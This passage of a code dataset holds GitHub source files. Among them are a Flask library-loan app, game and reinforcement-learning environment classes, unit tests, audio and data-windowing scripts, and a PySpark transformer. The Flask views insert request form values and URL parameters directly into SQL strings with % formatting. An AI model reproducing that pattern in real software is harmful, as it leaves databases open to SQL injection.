usuario\"\"\")\n    usuarios = cur.fetchall()\n\n    cur.execute(\"\"\"SELECT * FROM livro WHERE status = 'emprestado' or status = 'disponivel'\"\"\")\n    livros = cur.fetchall()\n\n    cur.close()\n    conn.close()\n\n    return render_template('add_reserva.html', form=form, livros=livros, usuarios=usuarios)\n\n\n@app.route('/cancelar_reserva/<id_reserva>', methods=['GET'])\ndef cancelar_reserva(id_reserva):\n\n    conn = get_connection()\n    cur = get_cursor(conn)\n\n    cur.execute(\"\"\"SELECT id_livro FROM reserva WHERE id_reserva = '%s'\"\"\" % id_reserva)\n    id_livro = cur.fetchone()\n\n    cur.execute(\"\"\"UPDATE livro SET status = 'disponivel' WHERE id_livro = '%s'\"\"\" % id_livro[0])\n\n    cur.execute(\"\"\"DELETE FROM reserva WHERE Id_reserva = '%s'\"\"\" % id_reserva)\n\n    conn.commit()\n\n    cur.close()\n    conn.close()\n\n    return redirect(url_for('home'))\n\n\n# ===============================\n# Livros\n# ===============================\n\n\n@app.route('/livros')\ndef livros():\n    conn = get_connection()\n    cur = get_cursor(conn)\n\n    cur.execute(\"\"\"SELECT * FROM livro \"\"\")\n    livros = cur.fetchall()\n\n    cur.close()\n    conn.close()\n\n    return render_template('livros.html', livros=livros)\n\n\n# ==============================\n# Emprestar\n# ==============================\n\n\n@app.route('/emprestar_livro', methods=['POST', 'GET'])\ndef emprestar_livro():\n    conn = get_connection()\n    cur = get_cursor(conn)\n\n    form = EmprestarForm()\n\n    if request.method == 'POST':\n        conn = get_connection()\n        cur = get_cursor(conn)\n\n        Id_usuario = request.form['Id_usuario']\n        Id_livro = request.form['Id_livro']\n        Data_emprestimo = request.form['Data_emprestimo']\n\n        cur.execute(\"\"\"INSERT INTO emprestimo (id_usuario, id_livro, data_emprestimo) VALUES ('%s', '%s', '%s')\"\"\" % (Id_usuario, Id_livro, Data_emprestimo))\n\n        cur.execute(\"\"\"UPDATE livro SET status = 'emprestado' WHERE id_livro = '%s'\"\"\" % Id_livro)\n\n        conn.commit()\n\n        return redirect(url_for('home'))\n\n    cur.execute(\"\"\"SELECT * FROM usuario\"\"\")\n    usuarios = cur.fetchall()\n\n    cur.execute(\"\"\"SELECT * FROM livro WHERE status = 'reservado' or status = 
'disponivel'\"\"\")\n livros = cur.fetchall()\n\n cur.close()\n conn.close()\n\n return render_template('emprestimo.html', form=form, livros=livros, usuarios=usuarios)\n\n\n@app.route('/devolver_livro/', methods=['GET'])\ndef devolver_livro(id_emprestimo):\n\n conn = get_connection()\n cur = get_cursor(conn)\n\n cur.execute(\"\"\"SELECT id_livro FROM emprestimo WHERE id_emprestimo = '%s'\"\"\" % id_emprestimo)\n id_livro = cur.fetchone()\n\n cur.execute(\"\"\"UPDATE livro SET status = 'disponivel' WHERE id_livro = '%s'\"\"\" % id_livro[0])\n\n cur.execute(\"\"\"DELETE FROM emprestimo WHERE Id_emprestimo = '%s'\"\"\" % id_emprestimo)\n\n conn.commit()\n\n cur.close()\n conn.close()\n\n return redirect(url_for('home'))\n\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","repo_name":"fernandasj/library-sparks-flask","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"2832183872","text":"from gym_stag_hunt.envs.gym.escalation import EscalationEnv\nfrom gym_stag_hunt.envs.pettingzoo.shared import PettingZooEnv\nfrom pettingzoo.utils import parallel_to_aec\n\n\ndef env(**kwargs):\n return ZooEscalationEnvironment(**kwargs)\n\n\ndef raw_env(**kwargs):\n return parallel_to_aec(env(**kwargs))\n\n\nclass ZooEscalationEnvironment(PettingZooEnv):\n metadata = {\"render_modes\": [\"human\", \"array\"], \"name\": \"escalation_pz\"}\n\n def __init__(\n self,\n grid_size=(5, 5),\n screen_size=(600, 600),\n obs_type=\"image\",\n enable_multiagent=False,\n opponent_policy=\"pursuit\",\n load_renderer=False,\n streak_break_punishment_factor=0.5,\n ):\n escalation_env = EscalationEnv(\n grid_size,\n screen_size,\n obs_type,\n enable_multiagent,\n opponent_policy,\n load_renderer,\n streak_break_punishment_factor,\n )\n super().__init__(og_env=escalation_env)\n","repo_name":"NullDefault/Gym-Stag-Hunt","sub_path":"gym_stag_hunt/envs/pettingzoo/escalation.py","file_name":"escalation.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"47"} +{"seq_id":"86591676346","text":"import random\nimport unittest\nfrom datetime import datetime\nfrom unittest.mock import MagicMock\n\nfrom src.dto.game_state import GameState\nfrom src.model.card import Card, CardSuit, CardValue\nfrom src.model.deck import Deck\nfrom src.model.game import Game\nfrom src.model.hand import Hand\nfrom src.model.stack import Stack\nfrom src.model.game_player import GamePlayer\nfrom src.repository.game_state_repository import GameStateRepository\nfrom src.repository.game_player_repository import GamePlayerRepository\n\n\n# from src.repository.player_repository import PlayerRepository\nfrom src.service.game_service import GameService\n\n# from src.model.stack import WonStack\n\n\ndef compare(self, other):\n\n if not type(self) == type(other):\n return False\n\n if self.game != other.game:\n return False\n\n if self.player_stacks != other.player_stacks:\n return False\n\n if self.player_hands != other.player_hands:\n return False\n\n return True\n\n\nclass Matcher:\n def __init__(self, compare_func, obj):\n self.compare_func = compare_func\n self.obj = obj\n\n def __eq__(self, other):\n return self.compare_func(self.obj, other)\n\n\nclass TestGameService(unittest.TestCase):\n def setUp(self):\n pass\n\n def test_join(self):\n number_of_players = 2\n game_player_id = \"1\"\n player_id = \"2\"\n game_id = 
\"123\"\n mock_game_player_repository = MagicMock(spec=GamePlayerRepository)\n game_service = GameService(game_player_repository=mock_game_player_repository)\n game_service.id_generator = MagicMock(return_value=game_player_id)\n\n game_service.join(player_id, game_id)\n\n expected_game_player = GamePlayer()\n expected_game_player.id = game_player_id\n expected_game_player.game_id = game_id\n expected_game_player.player_id = player_id\n\n mock_game_player_repository.create.assert_called_with(\n expected_game_player, number_of_players\n )\n\n def test_bootstrap(self):\n # creating mocks\n mock_game_state_repository = MagicMock(spec=GameStateRepository)\n mock_datetime = MagicMock(spec=datetime)\n mock_datetime.utcnow.return_value = datetime(2020, 1, 1, 1, 1, 1)\n mock_random = MagicMock(spec=random)\n mock_random.randrange.return_value = 0\n game_id = \"123\"\n\n # injecting mocks\n game_service = GameService(game_state_repository=mock_game_state_repository)\n game_service.id_generator = MagicMock(return_value=\"123\")\n game_service.datetime = mock_datetime\n game_service.random = mock_random\n\n # test\n game_service.bootstrap(game_id, Deck())\n\n expected_game_state = self.__get_game_state(game_id)\n # TODO: find proper names for Matcher&Co.\n match_foo = Matcher(compare, expected_game_state)\n mock_game_state_repository.save.assert_called_with(match_foo)\n\n def __get_game_state(self, game_id: str) -> GameState:\n now = datetime(2020, 1, 1, 1, 1, 1)\n\n # creating hands and deck\n hand1 = Hand()\n hand1.id = \"123\"\n hand1.game_id = game_id\n hand1.updated_at = now\n hand1.cards = [\n Card(CardValue.KING, CardSuit.CLUB),\n Card(CardValue.THREE, CardSuit.CLUB),\n Card(CardValue.ACE, CardSuit.CLUB),\n ]\n hand1.turn = 0\n\n hand2 = Hand()\n hand2.id = \"123\"\n hand2.game_id = game_id\n hand2.updated_at = now\n hand2.cards = [\n Card(CardValue.SEVEN, CardSuit.CLUB),\n Card(CardValue.JACK, CardSuit.CLUB),\n Card(CardValue.QUEEN, CardSuit.CLUB),\n ]\n hand2.turn = 1\n\n hands = [\n hand1,\n hand2,\n ]\n\n deck = Deck()\n deck.pick(6)\n\n game = Game()\n game.id = game_id\n game.cards = deck\n\n stack1 = Stack()\n stack1.id = \"123\"\n stack1.game_id = game_id\n\n stack2 = Stack()\n stack2.id = \"123\"\n stack2.game_id = game_id\n\n stacks = [stack1, stack2]\n\n game_state = GameState()\n\n game_state.game = game\n game_state.player_hands = hands\n game_state.player_stacks = stacks\n\n return game_state\n\n\n# def test_game_service_create():\n\n# # creating expected values\n# now = datetime(2020, 1, 1, 1, 1, 1)\n# random_id = \"abcdefgh\"\n# expected_game = Game()\n# expected_game.id = random_id\n# expected_game.created_at = now\n\n# # creating expected hands\n# hand1 = Hand()\n# hand1.id = \"123\"\n# hand1.created_at = now\n# hand1.player_id = \"1\"\n# hand1.cards = [\n# Card(CardValue.ACE, CardSuit.HEART),\n# Card(CardValue.DEUCE, CardSuit.HEART),\n# Card(CardValue.THREE, CardSuit.HEART),\n# ]\n# hand1.turn = 0\n\n# hand2 = Hand()\n# hand2.id = \"456\"\n# hand2.created_at = now\n# hand2.player_id = \"2\"\n# hand2.cards = [\n# Card(CardValue.FOUR, CardSuit.HEART),\n# Card(CardValue.FIVE, CardSuit.HEART),\n# Card(CardValue.SIX, CardSuit.HEART),\n# ]\n# hand2.turn = 1\n\n# expected_hands = [\n# hand1,\n# hand2,\n# ]\n\n# expected_deck = Deck()\n\n# # creating expected won stacks\n# won_stack1 = WonStack()\n# won_stack1.id = \"123\"\n# won_stack1.player_id = \"1\"\n# won_stack1.cards = []\n\n# won_stack2 = WonStack()\n# won_stack2.id = \"456\"\n# won_stack2.player_id = \"2\"\n# 
won_stack2.cards = []\n\n# expected_won_stacks = [\n# won_stack1,\n# won_stack2,\n# ]\n\n# # mocking repository\n# mock_game_repository = MagicMock(spec=GameRepository)\n# mock_game_repository.save.return_value = expected_player\n\n# # mocking datetime\n# mock_datetime = MagicMock(spec=datetime)\n# mock_datetime.now.return_value = now\n\n# # mocking id generator\n# mock_id_generator = MagicMock(return_value=random_id)\n\n# # injecting mocks into service\n# player_service = PlayerService(mock_player_repository)\n# player_service.datetime = mock_datetime\n# player_service.id_generator = mock_id_generator\n\n# # calling service\n# new_player = Player(id=None, name=\"johnny\")\n# player = player_service.create(new_player)\n\n# assert player.id == random_id\n# assert player.name == \"johnny\"\n# assert player.created_at == now\n# assert player.last_seen == now\n# mock_player_repository.save.assert_called_with(new_player)\n","repo_name":"Mistra/briscola","sub_path":"test/service/test_game_service.py","file_name":"test_game_service.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8515311756","text":"# import soundfile as sf\r\n\r\n# y, sr = sf.read('audio.wav', dtype='int16')\r\n# print(sr)\r\n\r\nimport wave\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# Open wav file and read frames as bytes\r\nsf_filewave = wave.open('sagar.wav', 'r')\r\nsignal_sf = sf_filewave.readframes(-1)\r\n# Convert audio bytes to integers\r\nsoundwave_sf = np.frombuffer(signal_sf, dtype='int16')\r\n# Get the sound wave frame rate\r\nframerate_sf = sf_filewave.getframerate()\r\n# Find the sound wave timestamps\r\ntime_sf = np.linspace(start=0,\r\n stop=len(soundwave_sf)/framerate_sf,\r\n num=len(soundwave_sf))\r\n# Set up plot\r\nf, ax = plt.subplots(figsize=(15, 3))\r\n# Setup the title and axis titles\r\nitem=max(soundwave_sf)\r\n# for idx, val in np.ndenumerate(soundwave_sf):\r\n# if val == item:\r\n# print(idx)\r\nprint(time_sf[list(soundwave_sf).index(item)])\r\nplt.title('Amplitude over Time')\r\nplt.ylabel('Amplitude')\r\nplt.xlabel('Time (seconds)')\r\n# Add the audio data to the plot\r\nplt.plot(time_sf, soundwave_sf, label='Warm Memories', alpha=0.5)\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n# import librosa\r\n# import matplotlib.pyplot.plot as plt\r\n# audio = 'audio.wav'\r\n# x, sr = librosa.load(audio)\r\n# X = librosa.stft(x)\r\n# Xdb = librosa.amplitude_to_db(abs(X))\r\n# plt.figure(figsize = (10, 5))\r\n# librosa.display.specshow(Xdb, sr = sr, x_axis = 'time', y_axis = 'hz')\r\n# plt.colorbar()","repo_name":"sagar-9850/syllabification","sub_path":"final_version/programs/wav.py","file_name":"wav.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71498331662","text":"import numpy as np\n\n\ndef create_X_Y(ts, f_size=10, offset=0, output_width=1, sum_=False):\n \n \"\"\"\n From a given time series, creates an input array containing the input windows and a label array containing \n the output windows for machine/deep learning tasks\n \n @Params:\n ts: array of float\n The time series\n f_size: int\n The input window size\n offset: int\n The offset between the last value of the input window and the first value of the output window\n output_width:\n The output window size\n sum_: bool\n If true, the label to predict will be the sum of the values contained in the output window\n \n 
@Returns:\n X: array of float\n The input array containing the input windows\n Y: array of float\n The label array containing the output windows\n \"\"\"\n\n X, Y = [], []\n\n for i in range(len(ts) - f_size - offset - output_width):\n if (output_width == 1):\n Y.append(ts[i + f_size + offset])\n elif not sum_:\n Y.append(ts[i + f_size + offset:i + f_size + offset + output_width])\n else:\n Y.append(np.sum(ts[i + f_size + offset:i + f_size + offset + output_width]))\n X.append(ts[i:(i + f_size)])\n \n X, Y = np.array(X), np.array(Y)\n \n X = np.reshape(X, (X.shape[0], X.shape[1], 1))\n if sum_: Y = np.reshape(Y, (Y.shape[0], 1))\n\n return X, Y\n\n","repo_name":"antoinethl/Research-work","sub_path":"app/source/_5_data_windowing/data_windowing.py","file_name":"data_windowing.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14248132222","text":"import random\n\n\nclass Combat:\n# define attributes common for attack and dodge\n\tmax_attack = 6\n\tmax_dodge = 6\n\n# define dodge behaviour\n\tdef dodge(self):\n\t\troll = random.randint(1, self.max_dodge)\n\t\tprint('Dodge roll: {}'.format(roll))\n\t\treturn roll > 4\n\n# define attack behaviour\n\n\tdef attack(self):\n\t\troll = random.randint(1, self.max_attack)\n\t\tprint('Attack roll: {}'.format(roll))\n\t\treturn roll > 4 # only return output if value of roll is greater than 4\n\t\n\n","repo_name":"JaminZoo/Treehouse","sub_path":"combat.py","file_name":"combat.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73447470543","text":"from __future__ import annotations\n\nfrom math import ceil\n\nimport cv2\nimport numpy as np\n\nfrom . 
import category as ImageFilterCategory\nfrom ...node_base import NodeBase\nfrom ...node_factory import NodeFactory\nfrom ...properties.inputs import ImageInput, NumberInput\nfrom ...properties.outputs import ImageOutput\nfrom ...utils.utils import get_h_w_c\n\n\n@NodeFactory.register(\"chainner:image:average_color_fix\")\nclass AverageColorFixNode(NodeBase):\n \"\"\"Fixes the average color of an upscaled image\"\"\"\n\n def __init__(self):\n super().__init__()\n self.description = \"\"\"Correct for upscaling model color shift by matching\n average color of Input Image to that of a smaller Reference Image.\n Using significant downscaling increases generalization of averaging effect\n and can reduce artifacts in the output.\"\"\"\n self.inputs = [\n ImageInput(\"Image\", channels=[3, 4]),\n ImageInput(\"Reference Image\", channels=[3, 4]),\n NumberInput(\n \"Reference Image Scale Factor\",\n precision=4,\n controls_step=12.5,\n maximum=100.0,\n default=12.5,\n unit=\"%\",\n ),\n ]\n self.outputs = [ImageOutput(image_type=\"Input0\")]\n self.category = ImageFilterCategory\n self.name = \"Average Color Fix\"\n self.icon = \"MdAutoFixHigh\"\n self.sub = \"Correction\"\n\n def run(\n self, input_img: np.ndarray, ref_img: np.ndarray, scale_factor: float\n ) -> np.ndarray:\n \"\"\"Fixes the average color of the input image\"\"\"\n\n if scale_factor != 100.0:\n # Make sure reference image dims are not resized to 0\n h, w, _ = get_h_w_c(ref_img)\n out_dims = (\n max(ceil(w * (scale_factor / 100)), 1),\n max(ceil(h * (scale_factor / 100)), 1),\n )\n\n ref_img = cv2.resize(\n ref_img,\n out_dims,\n interpolation=cv2.INTER_AREA,\n )\n\n input_h, input_w, input_c = get_h_w_c(input_img)\n ref_h, ref_w, ref_c = get_h_w_c(ref_img)\n\n assert (\n ref_w < input_w and ref_h < input_h\n ), \"Image must be larger than Reference Image\"\n\n # adjust channels\n alpha = None\n if input_c > ref_c:\n alpha = input_img[:, :, 3:4]\n input_img = input_img[:, :, :ref_c]\n elif ref_c > input_c:\n ref_img = ref_img[:, :, :input_c]\n\n # Find the diff of both images\n\n # Downscale the input image\n downscaled_input = cv2.resize(\n input_img,\n (ref_w, ref_h),\n interpolation=cv2.INTER_AREA,\n )\n\n # Get difference between the reference image and downscaled input\n downscaled_diff = ref_img - downscaled_input # type: ignore\n\n # Upsample the difference\n diff = cv2.resize(\n downscaled_diff,\n (input_w, input_h),\n interpolation=cv2.INTER_CUBIC,\n )\n\n result = input_img + diff\n\n # add alpha back in\n if alpha is not None:\n result = np.concatenate([result, alpha], axis=2)\n\n return np.clip(result, 0, 1)\n","repo_name":"orgTestCodacy11KRepos110MB/repo-1470-chaiNNer","sub_path":"backend/src/nodes/nodes/image_filter/avg_color_fix.py","file_name":"avg_color_fix.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28890813749","text":"from Newfoundland.Object import Object\nfrom Beagle import API as BGL\n\nclass DeadK(Object):\n def parse(od,df):\n DeadK.instance = DeadK(p=[od[\"x\"],od[\"y\"]])\n return DeadK.instance\n\n def customize(self):\n self.buftarget = \"popup\"\n self.size = [ 11.0,11.0 ]\n self.light_color = [ 1.0,0.6,0.6,1.0 ]\n self.light_radius = 20\n self.light_type = Object.LightTypes.DYNAMIC_SHADOWCASTER\n self.visible = True\n self.texture = BGL.assets.get(\"KT-forest/texture/deadk1\")\n self.tick_type = Object.TickTypes.STATIC\n self.z_index = 1\n #self.physics = { \"radius\" : 1.0, \"mass\" : 900, 
\"friction\" : 0.3 }\n\n def get_shader_params(self):\n sp = Object.get_shader_params(self)\n return sp\n","repo_name":"dzz/kthuune","sub_path":"src/Universe/LevelProps/DeadK.py","file_name":"DeadK.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21142152930","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\nsys.setrecursionlimit(10**8)\n\ndef traverse(p, s):\n global fileCnt\n if p not in direction: return\n \n for f, c in direction[p]:\n if c == '0':\n if f not in s:\n s.add(f)\n fileCnt += 1\n else:\n traverse(f, s)\n return\n\n\nn, m = map(int, input().split())\ndirection = {}\n\nfor _ in range(n+m):\n p, f, c = input().split()\n if p not in direction:\n direction[p] = []\n direction[p].append([f, c])\n\n\nfor _ in range(int(input())):\n query = input().split('/')\n s = set()\n fileCnt = 0\n traverse(query[-1], s)\n \n print(len(s), fileCnt)\n","repo_name":"cpwoo/CodeTest","sub_path":"Python/boj/graph/22860.py","file_name":"22860.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"19114869400","text":"class Student:\n # 这个属性直接定义在类里,是一个元组,用来规定对象可以存在的属性\n __slots__ = ('name', 'age', 'city')\n\n def __init__(self, x, y):\n self.name = x\n self.age = y\n\n def say_hello(self):\n print(\"大家好,我是\", self.name)\n\n\n# Student(\"张三\", 20)这段代码具体做了什么?\n# 1.调用__new__方法,用来申请内存空间\n# 2.调用__init__方法传入参数,将self指向创建好的内存空间,填充数据\n# 3.变量s1也指向创建好的内存空间\ns1 = Student(\"张三\", 20)\ns1.say_hello()\n\n# Student没有height会报错\n# print(s1.height)\n\n# 在没有定义slots属性的情况下,直接使用等号给一个属性赋值\n# 如果这个属性以前不存在,会给对象添加一个新的属性\n# 动态属性 若slots属性进行了定义,该属性不在slots的定义范围内,则不能进行添加操作,会报错\ns1.city = \"上海\"\nprint(s1.city)\ns2 = Student(\"Kevin\", 30)\ns2.say_hello()\nprint(s2.age)\n","repo_name":"zhaozhekey/Python-","sub_path":"Day11/代码/04-self语句的使用.py","file_name":"04-self语句的使用.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74342640782","text":"GNS = [\"ZRO\", \"ONE\", \"TWO\", \"THR\", \"FOR\", \"FIV\", \"SIX\", \"SVN\", \"EGT\", \"NIN\"]\nfor t in range(1, int(input()) + 1):\n tc = input().split()\n words = input().split()\n number = [0] * 10\n\n for word in words:\n for idx, element in enumerate(GNS):\n if element == word:\n number[idx] += 1\n break\n\n print(tc[0])\n\n for i in range(10):\n print((GNS[i] + ' ') * number[i], end=' ')\n print()","repo_name":"hyoonpark/Algorithm","sub_path":"SWEA/String/GNS2.py","file_name":"GNS2.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33302359945","text":"# Utils\nimport argparse\nimport glob\nfrom pathlib import Path\nimport yaml\nimport pandas as pd\n# Deep learning Stuff\nfrom torch.utils.data import DataLoader\nimport ttach as tta\n\n# Function Created by me\nfrom dataset import *\nfrom model import *\nfrom train_func import *\n\n\ndef main(cfg):\n test_df = pd.read_csv(cfg['test_file'])\n probabilitys = None\n seed_everything(cfg['seed'])\n gc.enable()\n device = return_device()\n test_df['file_path'] = test_df['Image_id'].apply(lambda x: return_filpath(x, folder=cfg['test_dir']))\n\n test_dataset = Cultivar_data_inference(image_path=test_df['file_path'],\n cfg=cfg,\n transform=get_train_transforms(cfg['image_size']),\n 
transform_rgn=get_train_transforms_rgn(cfg['image_size']))\n\n test_loader = DataLoader(\n test_dataset, batch_size=cfg['batch_size'], shuffle=False,\n num_workers=cfg['num_workers'], pin_memory=cfg['pin_memory']\n )\n\n for path in glob.glob(f\"{cfg['model_path']}/*.pth\"):\n model = BaseModelFeature(cfg)\n model.load_state_dict(torch.load(path))\n model = tta.ClassificationTTAWrapper(model, tta.aliases.flip_transform())\n\n model.to(device)\n model.eval()\n probablity = inference_fn(test_loader, model, cfg)\n\n if probabilitys is None:\n probabilitys = probablity / 5\n else:\n probabilitys += probablity / 5\n del model\n gc.collect()\n torch.cuda.empty_cache()\n blast = []\n brown = []\n healthy = []\n probabilitys = probabilitys.detach().cpu().numpy()\n for i in probabilitys:\n blast.append(i[0])\n brown.append(i[1])\n healthy.append(i[2])\n sub = pd.DataFrame({\"filename\": test_df['Image_id'], \"blast\": blast, \"brown\": brown, \"healthy\": healthy})\n np.save(cfg['probablity_file'], probabilitys, allow_pickle=True)\n sub.to_csv(cfg['submission_file'], index=False)\n\n\nif __name__ == '__main__' and '__file__' in globals():\n parser = argparse.ArgumentParser(description='Baseline')\n parser.add_argument(\"--file\", type=Path)\n args = parser.parse_args()\n with open(str(args.file), \"r\") as stream:\n config = yaml.safe_load(stream)\n main(config)\n","repo_name":"ZindiAfrica/Computer-Vision","sub_path":"Image Classification/Microsoft Rice Disease Classification Challenge/#9 Mithilsalunkhe/notebooks/src/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"25057370063","text":"\"\"\"\nModule contains logging related functions and variables\n\"\"\"\n\nimport logging\nimport logging.config\n\nfrom config import Config\n\nlogging.config.fileConfig(Config.CONFIG_FILE)\nlogger = logging.getLogger()\n\n_LOGGERS = {\n 'kafka': Config.KAFKA_LOGGING_LEVEL,\n 'tornado': Config.TORNADO_LOGGING_LEVEL,\n 'matplotlib': Config.MATPLOTLIB_LOGGING_LEVEL\n}\n\n\ndef configure_lib_loggers() -> None:\n \"\"\"Function sets logging levels from config for external modules\"\"\"\n for log, level in _LOGGERS.items():\n lib_logger = logging.getLogger(log)\n lib_logger.setLevel(level)\n","repo_name":"kjuraszek/epd-rpi-controller","sub_path":"controller/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25015341354","text":"from enum import Enum\n\nfrom pyspark import keyword_only\nfrom pyspark.ml.param.shared import HasInputCol\nfrom pyspark.ml.param.shared import HasOutputCol\nfrom pyspark.ml.param.shared import Param\nfrom pyspark.ml.param.shared import Params\nfrom pyspark.ml.param.shared import TypeConverters\nfrom pyspark.ml.util import JavaMLReadable\nfrom pyspark.ml.util import JavaMLWritable\nfrom pyspark.ml.util import _jvm\nfrom pyspark.ml.wrapper import JavaTransformer\n\nfrom mleap.pyspark.py2scala import jvm_scala_object\nfrom mleap.pyspark.py2scala import ScalaNone\nfrom mleap.pyspark.py2scala import Some\n\n\nclass BinaryOperation(Enum):\n Add = 1\n Subtract = 2\n Multiply = 3\n Divide = 4\n Remainder = 5\n LogN = 6\n Pow = 7\n Min = 8\n Max = 9\n\n\nclass MathBinary(JavaTransformer, HasOutputCol, JavaMLReadable, JavaMLWritable):\n\n inputA = Param(\n Params._dummy(),\n \"inputA\",\n \"input for left side of binary 
operation\",\n typeConverter=TypeConverters.toString,\n )\n\n inputB = Param(\n Params._dummy(),\n \"inputB\",\n \"input for right side of binary operation\",\n typeConverter=TypeConverters.toString,\n )\n\n @keyword_only\n def __init__(\n self,\n operation=None,\n inputA=None,\n inputB=None,\n outputCol=None,\n defaultA=None,\n defaultB=None,\n ):\n \"\"\"\n Computes the mathematical binary `operation` over\n the input columns A and B.\n\n :param operation: BinaryOperation to specify the operation type\n :param inputA: column name for the left side of operation (string)\n :param inputB: column name for the right side of operation (string)\n :param outputCol: output column name (string)\n :param defaultA: Default to use instead of inputA. This will only be used\n when inputA is None. For example when defaultA=4,\n operation=BinaryOperation.Multiply and inputB=f1, then all entries of\n col f1 will be multiplied by 4.\n :param defaultB: Default to use instead of inputB. This will only be used\n when inputB is None. For example when defaultB=4,\n operation=BinaryOperation.Multiply and inputA=f1, then all entries of\n col f1 will be multiplied by 4.\n\n NOTE: `operation`, `defaultA`, `defaultB` is not a JavaParam because\n the underlying MathBinary scala object uses a MathBinaryModel to store\n the info about the binary operation.\n\n `operation` has a None default value even though it should *never* be\n None. A None value is necessary upon deserialization to instantiate a\n MathBinary without errors. Afterwards, pyspark sets the _java_obj to\n the deserialized scala object, which encodes the operation (as well\n as the default values for A and B).\n \"\"\"\n super(MathBinary, self).__init__()\n\n # if operation=None, it means that pyspark is reloading the model\n # from disk and calling this method without args. 
In such case we don't\n # need to set _java_obj here because pyspark will set it after creation\n #\n # if operation is not None, we can proceed to instantiate the scala classes\n if operation:\n scalaBinaryOperation = jvm_scala_object(\n _jvm().ml.combust.mleap.core.feature,\n f\"BinaryOperation${operation.name}$\"\n )\n\n scalaMathBinaryModel = _jvm().ml.combust.mleap.core.feature.MathBinaryModel(\n scalaBinaryOperation,\n Some(defaultA) if defaultA is not None else ScalaNone(),\n Some(defaultB) if defaultB is not None else ScalaNone(),\n )\n self._java_obj = self._new_java_obj(\n \"org.apache.spark.ml.mleap.feature.MathBinary\",\n self.uid,\n scalaMathBinaryModel,\n )\n\n self._setDefault()\n self.setParams(inputA=inputA, inputB=inputB, outputCol=outputCol)\n\n @keyword_only\n def setParams(self, inputA=None, inputB=None, outputCol=None):\n \"\"\"\n Sets params for this MathBinary.\n \"\"\"\n # For the correct behavior of MathBinary, params that are None must be unset\n kwargs = {k: v for k, v in self._input_kwargs.items() if v is not None}\n return self._set(**kwargs)\n\n def setInputA(self, value):\n \"\"\"\n Sets the value of :py:attr:`inputA`.\n \"\"\"\n return self._set(inputA=value)\n\n def setInputB(self, value):\n \"\"\"\n Sets the value of :py:attr:`inputB`.\n \"\"\"\n return self._set(inputB=value)\n\n def setOutputCol(self, value):\n \"\"\"\n Sets the value of :py:attr:`outputCol`.\n \"\"\"\n return self._set(outputCol=value)\n","repo_name":"combust/mleap","sub_path":"python/mleap/pyspark/feature/math_binary.py","file_name":"math_binary.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":1481,"dataset":"github-code","pt":"47"} +{"seq_id":"24005623103","text":"from google.appengine.ext import db\nfrom django.utils import simplejson\nfrom dict2xml import dict2xml\n\nclass Level(db.Model):\n ''' Defines a level'''\n \n # the word grid as a string. 
wrapped around by the client \n    grid = db.StringProperty()\n    # list of words available to be found in the grid \n    word_bank = db.StringListProperty()\n    # when this level is active \n    time = db.DateTimeProperty()\n    \n    def to_xml(self):\n        obj = {\"response\" : {\"level_id\": self.key().id(), \"grid\": self.grid, \"word_bank\" : {\"word\" : self.word_bank}, \"time\" : str(self.time)}}\n        return dict2xml(obj).to_string()\n    \n    def to_json(self):\n        obj = {\"response\" : {\"level_id\": self.key().id(), \"grid\": self.grid, \"word_bank\" : self.word_bank, \"time\" : str(self.time)}}\n        return simplejson.dumps(obj)\n    \n    \nclass User(db.Model):\n    ''' User for keeping track of scores and submissions '''\n    name = db.StringProperty()\n\nclass Submission(db.Model):\n    ''' When a level is completed by a user '''\n    \n    # submitting user \n    user = db.ReferenceProperty(User)\n    # score achieved for submission \n    score = db.IntegerProperty()\n    # time of submission \n    time = db.DateTimeProperty()\n    # list of words found in the session \n    words_found = db.StringListProperty()\n    # reference to the level object\n    level = db.ReferenceProperty(Level)","repo_name":"akawry/seekword","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"27820839194","text":"from micropython import const\n\nfrom trezor import ui\n\nTEXT_HEADER_HEIGHT = const(48)\nTEXT_LINE_HEIGHT = const(26)\nTEXT_LINE_HEIGHT_HALF = const(13)\nTEXT_MARGIN_LEFT = const(14)\nTEXT_MAX_LINES = const(5)\n\n# needs to be different from all colors and font ids\nBR = const(-256)\nBR_HALF = const(-257)\n\n\ndef render_text(words: list, new_lines: bool, max_lines: int) -> 